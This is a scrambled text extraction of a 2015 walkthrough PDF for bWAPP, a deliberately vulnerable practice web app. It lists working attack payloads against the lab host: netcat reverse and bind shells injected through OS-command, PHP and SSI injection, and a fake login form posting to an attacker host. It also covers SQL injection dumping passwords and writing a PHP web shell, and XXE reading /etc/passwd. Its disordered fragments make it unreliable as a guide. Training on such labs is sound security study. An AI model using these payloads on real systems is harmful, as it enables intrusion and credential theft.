bwapp-tutorial.pdf

bWAPP - Sanjiv KawaApril 2, 2015 10:37 AM / A1 - Injection / HTML Injection - Reflected (GET) HTML Injection - Reflected (POST) HTML Injection - Reflected (Current URL) HTML Injection - Stored (Blog) iFrame Injection LDAP Injection (Search) Mail Header Injection (SMTP) OS Command Injection OS Command Injection - Blind PHP Code Injection Server-Side Includes (SSI) Injection SQL Injection (GET/Search) SQL Injection (GET/Select) SQL Injection (POST/Search) SQL Injection (POST/Select) SQL Injection (AJAX/JSON/jQuery) SQL Injection (CAPTCHA) SQL Injection (Login Form/Hero) SQL Injection (Login Form/User) SQL Injection (SQLite) SQL Injection (Drupal) SQL Injection - Stored (Blog) SQL Injection - Stored (SQLite) SQL Injection - Stored (User-Agent) SQL Injection - Stored (XML) SQL Injection - Blind - Boolean-Based SQL Injection - Blind - Time-Based SQL Injection - Blind (SQLite) SQL Injection - Blind (Web Services/SOAP) XML/XPath Injection (Login Form) XML/XPath Injection (Search) / A2 - Broken Auth. & Session Mgmt. / Broken Authentication - CAPTCHA Bypassing Broken Authentication - Forgotten Function Broken Authentication - Insecure Login Forms Broken Authentication - Logout Management Broken Authentication - Password Attacks Broken Authentication - Weak Passwords Session Management - Administrative Portals Session Management - Cookies (HTTPOnly) Session Management - Cookies (Secure) Session Management - Session ID in URL Session Management - Strong Sessions / A3 - Cross-Site Scripting (XSS) / Cross-Site Scripting - Reflected (GET) Cross-Site Scripting - Reflected (POST) Cross-Site Scripting - Reflected (JSON) Cross-Site Scripting - Reflected (AJAX/JSON) Cross-Site Scripting - Reflected (AJAX/XML) bWAPP Page 1 Cross-Site Scripting - Reflected (AJAX/XML) Cross-Site Scripting - Reflected (Back Button) Cross-Site Scripting - Reflected (Custom Header) Cross-Site Scripting - Reflected (Eval) Cross-Site Scripting - Reflected (HREF) Cross-Site Scripting - Reflected (Login Form) Cross-Site Scripting - Reflected (phpMyAdmin) Cross-Site Scripting - Reflected (PHP_SELF) Cross-Site Scripting - Reflected (Referer) Cross-Site Scripting - Reflected (User-Agent) Cross-Site Scripting - Stored (Blog) Cross-Site Scripting - Stored (Change Secret) Cross-Site Scripting - Stored (Cookies) Cross-Site Scripting - Stored (SQLiteManager) Cross-Site Scripting - Stored (User-Agent) / A4 - Insecure Direct Object References / Insecure DOR (Change Secret) Insecure DOR (Reset Secret) Insecure DOR (Order Tickets) / A5 - Security Misconfiguration / Arbitrary File Access (Samba) Cross-Domain Policy File (Flash) Cross-Origin Resource Sharing (AJAX) Cross-Site Tracing (XST) Denial-of-Service (Large Chunk Size) Denial-of-Service (Slow HTTP DoS) Denial-of-Service (SSL-Exhaustion) Denial-of-Service (XML Bomb) Insecure FTP Configuration Insecure SNMP Configuration Insecure WebDAV Configuration Local Privilege Escalation (sendpage) Local Privilege Escalation (udev) Man-in-the-Middle Attack (HTTP) Man-in-the-Middle Attack (SMTP) Old/Backup & Unreferenced Files Robots File / A6 - Sensitive Data Exposure / Base64 Encoding (Secret) BEAST/CRIME/BREACH Attacks Clear Text HTTP (Credentials) Heartbleed Vulnerability Host Header Attack (Reset Poisoning) HTML5 Web Storage (Secret) POODLE Vulnerability SSL 2.0 Deprecated Protocol Text Files (Accounts) / A7 - Missing Functional Level Access Control / Directory Traversal - Directories Directory Traversal - Files Host Header Attack (Cache Poisoning) Host Header Attack (Reset Poisoning) Local File Inclusion (SQLiteManager) Remote & Local File Inclusion (RFI/LFI) bWAPP Page 2 Remote & Local File Inclusion (RFI/LFI) Restrict Device Access Restrict Folder Access Server Side Request Forgery (SSRF) XML External Entity Attacks (XXE) / A8 - Cross-Site Request Forgery (CSRF) / Cross-Site Request Forgery (Change Password) Cross-Site Request Forgery (Change Secret) Cross-Site Request Forgery (Transfer Amount) / A9 - Using Known Vulnerable Components / Buffer Overflow (Local) Buffer Overflow (Remote) Drupal SQL Injection (Drupageddon) Heartbleed Vulnerability PHP CGI Remote Code Execution PHP Eval Function phpMyAdmin BBCode Tag XSS Shellshock Vulnerability (CGI) SQLiteManager Local File Inclusion SQLiteManager PHP Code Injection SQLiteManager XSS / A10 - Unvalidated Redirects & Forwards / Unvalidated Redirects & Forwards (1) Unvalidated Redirects & Forwards (2) / Other bugs... / ClickJacking (Movie Tickets) Client-Side Validation (Password) HTTP Parameter Pollution HTTP Response Splitting HTTP Verb Tampering Information Disclosure - Favicon Information Disclosure - Headers Information Disclosure - PHP version Information Disclosure - Robots File Insecure iFrame (Login Form) Unrestricted File Upload --------------------------- Extras -------------------------- A.I.M. - No-authentication Mode Client Access Policy File Cross-Domain Policy File Evil 666 Fuzzing Page Manual Intervention Required! Unprotected Admin Portal We Steal Secrets... (html) We Steal Secrets... (plain) WSDL File (Web Services/SOAP) bWAPP Page 3 Blind (SQLite) *SQL Injection .Stored (User-Agent) SQL Injection .Stored (XML) *SQL Injection .Reflected (POST) HTML Injection .Blind (Web Services/SOAP) *XML/XPath Injection (Search) bWAPP Page 4 . 2015 9:03 AM Areas with an asterix next to them have not been listed in this walkthough.Stored (Blog) iFrame Injection OS Command Injection OS Command Injection .Blind .Blind .Reflected (GET) HTML Injection .Boolean-Based SQL Injection .Stored (SQLite) SQL Injection .A1: Injection March 31.Time-Based XML/XPath Injection (Login Form) *LDAP Injection (Search) *Mail Header Injection (SMTP) *SQL Injection (AJAX/JSON/jQuery) *SQL Injection (CAPTCHA) *SQL Injection (Login Form/User) *SQL Injection .Stored (Blog) SQL Injection . HTML Injection .Blind PHP Code Injection Server-Side Includes (SSI) Injection SQL Injection (GET/Search) SQL Injection (GET/Select) SQL Injection (POST/Search) SQL Injection (POST/Select) SQL Injection (Login Form/Hero) SQL Injection (SQLite) SQL Injection (Drupal) SQL Injection .Reflected (Current URL) HTML Injection . com"> Click Me!</a></h1>&lastname=<h2>blah</h2>&form=submit bWAPP Page 5 .254. 2015 9:03 AM <h2>HTML Injection .google.HTML Injection .php?firstname=<h1><a href="http://www.168.Reflected (GET) March 31.Reflected (GET)</h2> http://192.131/bWAPP/htmli_get. Reflected (POST) March 31. 2015 9:08 AM bWAPP Page 6 .HTML Injection . firstname=<h1><a href="http://www.google.com">Click Me!</a></h1>&lastname=<h2> blah</h2>&form=submit bWAPP Page 7 . 2015 9:11 AM bWAPP Page 8 .Reflected (URL) March 31.HTML Injection . bWAPP Page 9 . 2015 9:16 AM <div class="code"><iframe SRC="http://attackerIP/blah" height="0" width="0"></iframe></div> <div class="code">test</div> bWAPP Page 10 .Stored (Blog) March 31.HTML Injection . <div class="code">test</div> <div style="position: absolute. z-index: 1000. width: 800px. left: 0px. height: 600px.htm"> <table> <tr><td>Username:</td><td><input type="text" name="uname"/></td></tr> <tr><td>Password:</td><td><input type="password" name="pw"/></td></tr> </table> <input type="submit" value="Login"/> </form> </div> bWAPP Page 11 . Please Login:<br> <form name="login" action="http://attackerIP/lol. background-color:white. top: 0px."> Session Expired. bWAPP Page 12 . 254.com/&ParamWidth=500 &ParamHeight=500 bWAPP Page 13 . 2015 9:42 AM http://192.iFrame Injection March 31.php?ParamUrl=http://www.131/bWAPP/iframei.hello.168. bWAPP Page 14 . 128 4444 -e /bin/bash bWAPP Page 15 .254.168.gov && nc -vn 192.nsa. 2015 10:47 AM www.OS Command Injection March 31. . whoami bWAPP Page 16 . 2015 11:07 AM bWAPP Page 17 .OS Command Injection (Blind) March 31. html bWAPP Page 18 .168.168.128 4444 -e /bin/bash http://thehackpot.blogspot.ca/2014/05/blind-os-command-injection-attacks.254.192.254.128 && nc -vn 192. 2015 11:29 AM bWAPP Page 19 .PHP Code Injection March 31. phpinfo() bWAPP Page 20 .message=1. bWAPP Page 21 . system('nc -lvp 1234 -e /bin/bash') bWAPP Page 22 .phpi.php?message="". Server Side Include (SSI) Injection March 31. 2015 11:50 AM <!--#exec cmd="id" --> <!--#exec cmd="cat /etc/passwd" --> bWAPP Page 23 . connect to me on port 8888! <!--#exec cmd="nc -lvp 8888 -e /bin/bash" --> bWAPP Page 24 . 2015 11:53 AM bWAPP Page 25 .SQLi (GET/Search) March 31. bWAPP Page 26 . sqli_1.php?title='&action=search bWAPP Page 27 . php?title=iron' or 1=1#&action=search bWAPP Page 28 .sqli_1. 6.5.sqli_1.3.php?title=validEntry' or 1=2#&action=search sqli_1.php?title=iron' union select 1.7 #&action=search bWAPP Page 29 .4.2. 7 #&action=search iron' union select 1.php' #&action=search bWAPP Page 30 .6.7 into OUTFILE '/var/www/bWAPP/popped.email.password.4.3.5.4.5.5.sqli_1.login.@@version.php?title=iron' union select 1.php?title=iron' union select 1.6.6."<?php echo shell_exec($_GET['cmd'])?>".user().7 from users # sqli_1. Select * from movies where title like 'iron' bWAPP Page 31 . 2015 12:35 PM sqli_2.SQLi (GET/Select) March 31.php?movie=1 and 1=2#&action=go bWAPP Page 32 . 3.sqli_2.5.2.6.2.5.4.4.6#&action=go sqli_2.3.php?movie=1 union select 1.php?movie=1 union select 1.7#&action=go bWAPP Page 33 . password.3.7#&action=go sqli_2.php?movie=1337 union select 1.2.login.7 from users#&action=go bWAPP Page 34 .6.5.3.sqli_2.email.4.php?movie=1337 union select 1.6. 2015 1:07 PM bWAPP Page 35 .SQLi (POST/Search) March 31. bWAPP Page 36 . bWAPP Page 37 . bWAPP Page 38 . 2015 1:06 PM bWAPP Page 39 .SQLi (POST/Select) March 31. SQLi (Login Form/Hero) March 31. 2015 2:48 PM ' bWAPP Page 40 . login=' or 1=1#&password=&form=submit bWAPP Page 41 . bWAPP Page 42 . SQLi Stored (Blog) March 31. 2015 3:34 PM bWAPP Page 43 . test'.'test')# bWAPP Page 44 . bWAPP Page 45 . canary1'.'canary2')# bWAPP Page 46 . canary1'.user where user='root' limit 0.1))# bWAPP Page 47 .(select password from mysql. (select version()))# canary1'.(select user()))# bWAPP Page 48 .canary1'. SQLi Stored (User-Agent) March 31. 2015 3:56 PM bWAPP Page 49 . bWAPP Page 50 bWAPP Page 51 SQLi Blind (Boolean Based) April 1, 2015 9:31 AM This can be leveraged in conjunction with the substring function to identify table names based on true/false responses bWAPP Page 52 1) = '5'. SLEEP(5). 2015 9:35 AM test'-IF(MID(VERSION(). 0)# bWAPP Page 53 .1.SQLi Blind (Time Based) April 1. XML/XPATH Injection (Login Form) April 1, 2015 10:14 AM Intercept responses http://pastebin.com/index/uT6zQGVx $login = $_REQUEST["login"]; $login = xmli($login); $password = $_REQUEST["password"]; $password = xmli($password); // Loads the XML file $xml = simplexml_load_file("passwords/heroes.xml"); // XPath search $result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']"); [login='" . $login . "' and password='" . $password . "'] [login='' and password=''] [login='whatever'' and password=''] [login='whatever' or 1=1' and password=''] bWAPP Page 54 [login='whatever' or 1=1' and password=''] [login='whatever' or 1=1 or '' and password=''] whatever' or 1=1 or ' bWAPP Page 55 A2: Broken Authentication April 1, 2015 3:24 PM Areas with an asterix next to them have not been listed in this walkthough. Broken Authentication - Insecure Login Forms Broken Authentication - Logout Management Session Management - Administrative Portals *Broken Authentication - CAPTCHA Bypassing *Broken Authentication - Forgotten Function *Broken Authentication - Password Attacks *Broken Authentication - Weak Passwords *Session Management - Cookies (HTTPOnly) *Session Management - Cookies (Secure) *Session Management - Session ID in URL *Session Management - Strong Sessions bWAPP Page 56 Insecure Login Form April 1. 2015 3:25 PM bWAPP Page 57 .BA . Logout Management April 1. 2015 3:26 PM bWAPP Page 58 .BA . 2015 3:31 PM bWAPP Page 59 .BA .Session Management April 1. bWAPP Page 60 . A4: Insecure Direct Object References April 1. 2015 3:46 PM Areas with an asterix next to them have not been listed in this walkthough. Insecure DOR (Change Secret) Insecure DOR (Order Tickets) *Insecure DOR (Reset Secret) bWAPP Page 61 . Insecure Direct Object Reference (Change Secret) April 1. 2015 3:42 PM Bee can be changed to bob bWAPP Page 62 . bWAPP Page 63 . Insecure Direct Object Reference (Order Ticket) April 1. 2015 3:51 PM bWAPP Page 64 . bWAPP Page 65 . Base64 Encoding (Secret) HTML5 Web Storage (Secret) *BEAST/CRIME/BREACH Attacks *Clear Text HTTP (Credentials) *Heartbleed Vulnerability *Host Header Attack (Reset Poisoning) *POODLE Vulnerability *SSL 2.A6: Sensitive Data Exposure April 2. 2015 9:15 AM Areas with an asterix next to them have not been listed in this walkthough.0 Deprecated Protocol *Text Files (Accounts) bWAPP Page 66 . 2015 9:15 AM bWAPP Page 67 .Base64 Encoding April 2. 2015 9:16 AM bWAPP Page 68 .HTML5 Web Storage April 2. bWAPP Page 69 . Files Host Header Attack (Cache Poisoning) Remote & Local File Inclusion (RFI/LFI) Restrict Device Access XML External Entity Attacks (XXE) *Directory Traversal .A7: Missing Functional Level Access Control April 1. 2015 4:06 PM Areas with an asterix next to them have not been listed in this walkthough. Directory Traversal .Directories *Host Header Attack (Reset Poisoning) *Local File Inclusion (SQLiteManager) *Restrict Folder Access *Server Side Request Forgery (SSRF) bWAPP Page 70 . Directory Traversal (Directories) April 1. 2015 4:07 PM bWAPP Page 71 . bWAPP Page 72 . Directory Traversal (Files) Wednesday. 2015 7:48 PM bWAPP Page 73 . April 1. bWAPP Page 74 . 2015 8:02 PM bWAPP Page 75 .Host Header Attack (Cache Poisoning) Wednesday. April 1. bWAPP Page 76 . bWAPP Page 77 . bWAPP Page 78 . bWAPP Page 79 . 2015 8:27 PM bWAPP Page 80 . April 1.Remote and Local File Inclusion Wednesday. bWAPP Page 81 . bWAPP Page 82 . bWAPP Page 83 . bWAPP Page 84 . Restrict Device Access Wednesday.7 bWAPP Page 85 .22. April 1.0.en-us)AppleWebKit/532.0(iPhone.likeGecko) Version/4.5Mobile/8A293Safari/6531.CPUiPhoneOS4_0likeMacOSX.U.9(KHTML. 2015 8:38 PM Mozilla/5. bWAPP Page 86 . XML External Entity Attacks (XXE) April 2. 2015 8:24 AM bWAPP Page 87 . txt"> ]> <reset><login>&popped.</login><secret>Any bugs?</secret></reset> bWAPP Page 88 .0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY popped SYSTEM "http://192.254.131/bWAPP/robots.<?xml version="1.168. <?xml version="1.</login><secret>Any bugs?</secret></reset> bWAPP Page 89 .0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY popped SYSTEM "file:///etc/passwd"> ]> <reset><login>&popped. bWAPP Page 90 . exploit-db.com/papers/13694/ http://insecurety. 2015 1:38 PM http://www.Extras: PHP Eval() April 2.net/?p=705 bWAPP Page 91 .